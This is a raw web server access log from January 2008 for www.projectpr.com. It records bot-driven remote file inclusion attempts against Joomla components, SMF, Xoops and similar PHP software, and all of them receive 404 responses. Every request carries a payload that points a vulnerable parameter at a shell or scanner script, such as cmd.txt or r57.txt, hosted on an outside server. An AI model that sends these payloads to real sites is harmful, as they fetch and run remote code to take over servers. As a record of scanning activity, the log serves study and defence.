85.214.29.90 - - [12/Jan/2008:05:47:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:47:45 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:47:45 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:47:46 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:51 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:51 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:51 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 279 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:52 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:52 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
67.19.3.34 - - [12/Jan/2008:05:47:52 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
205.234.252.183 - - [12/Jan/2008:05:47:55 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:05:48:18 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:05:48:18 -0800] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 291 "-" "libwww-perl/5.803" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:41 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:41 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:41 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:53 -0800] "GET /logs/access.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:53 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
38.102.88.143 - - [12/Jan/2008:05:48:53 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.sgfattorneys.com/obsportal//language/shep/mic.txt?? HTTP/1.1" 404 294 "-" "libwww-perl/5.808" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
72.5.54.19 - - [12/Jan/2008:05:52:03 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:05:52:08 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:05:52:08 -0800] "GET //skin/zero_vote/error.php?dir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 271 "-" "libwww-perl/5.69" "www.projectpr.com"
85.214.29.90 - - [12/Jan/2008:05:52:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.psicosalute.it/modules/xt_conteudo_copia/images/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:05:52:43 -0800] "GET /logs/access_070812.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 313 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:05:52:44 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:05:52:44 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:25 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:25 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 292 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:26 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:26 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:26 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:53:26 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:41 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 290 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:41 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:41 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:46 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:46 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
89.96.224.38 - - [12/Jan/2008:05:53:47 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://www.fastmodding.com//shop/images/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
70.85.19.68 - - [12/Jan/2008:05:54:02 -0800] "GET /logs/access_070712.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:55:32 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:55:32 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 276 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:56:22 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:56:23 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:56:24 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
58.145.192.10 - - [12/Jan/2008:05:57:41 -0800] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:57:59 -0800] "GET /logs/access.log///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:58:00 -0800] "GET ///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:58:00 -0800] "GET /logs///modules/xfsection/modify.php?dir_module=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 281 "-" "libwww-perl/5.65" "www.projectpr.com"
58.145.192.10 - - [12/Jan/2008:05:58:14 -0800] "GET ///components/com_hashcash/server.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:59:05 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:59:06 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:05:59:06 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:05:59:16 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:05:59:16 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
151.1.141.17 - - [12/Jan/2008:05:59:17 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://rmk.se/bilder/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:06:00:56 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 296 "-" "libwww-perl/5.79" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:06:01:23 -0800] "GET /modules/xfsection/modify.php?dir_module=http://www.shikea.se/file/iid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.projectpr.com"
89.212.80.130 - - [12/Jan/2008:06:01:23 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://www.shikea.se/file/iid.txt? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:06:04:29 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
76.248.166.46 - - [12/Jan/2008:06:04:54 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:06:06:55 -0800] "GET /logs/access_070912.log//includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:06:06:55 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
66.225.219.10 - - [12/Jan/2008:06:06:55 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:07:15 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:07:15 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:07:16 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:09:37 -0800] "GET //skin/zero_vote/error.php?dir=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
209.59.195.106 - - [12/Jan/2008:06:09:49 -0800] "GET //skin/zero_vote/error.php?dir=http://geocities.com/aliif_1604/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:23 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:23 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:23 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:23 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:23 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:24 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:37 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:37 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
86.109.165.93 - - [12/Jan/2008:06:10:38 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:12:30 -0800] "GET /logs/access.log///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:12:30 -0800] "GET ///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
206.55.125.228 - - [12/Jan/2008:06:12:31 -0800] "GET /logs///components/com_smf/smf.php?mosConfig_absolute_path=http://klein.no/UserFiles/Image/test/djd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:06:14:18 -0800] "GET /logs/access_070912.log//includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:06:14:19 -0800] "GET //includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
81.25.68.146 - - [12/Jan/2008:06:14:19 -0800] "GET /logs//includes/dbal.php?eqdkp_root_path=http://www.slmsistemas.net/components/contr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.projectpr.com"
198.63.47.58 - - [12/Jan/2008:06:16:43 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.0" 404 258 "-" "libwww-perl/5.53" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:06:17:10 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
67.192.48.155 - - [12/Jan/2008:06:17:10 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:06:18:24 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
193.142.215.14 - - [12/Jan/2008:06:18:24 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://usualsuspectsdkp.3x.ro/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:19:26 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:19:26 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.65" "www.projectpr.com"
198.63.47.58 - - [12/Jan/2008:06:21:01 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
198.63.47.58 - - [12/Jan/2008:06:21:02 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
198.63.47.58 - - [12/Jan/2008:06:21:02 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:21:05 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.808" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:21:06 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
200.69.205.114 - - [12/Jan/2008:06:21:06 -0800] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:21:17 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:21:17 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:21:17 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:21:17 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.210.133.196 - - [12/Jan/2008:06:21:28 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 274 "-" "libwww-perl/5.79" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:22:09 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:22:09 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
85.17.3.141 - - [12/Jan/2008:06:22:09 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:22:24 -0800] "GET /logs/access.log/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:22:25 -0800] "GET /modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
200.80.35.36 - - [12/Jan/2008:06:22:25 -0800] "GET /logs/modules/xfsection/modify.php?dir_module=http://catzu.altervista.org/scantxt.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.projectpr.com"
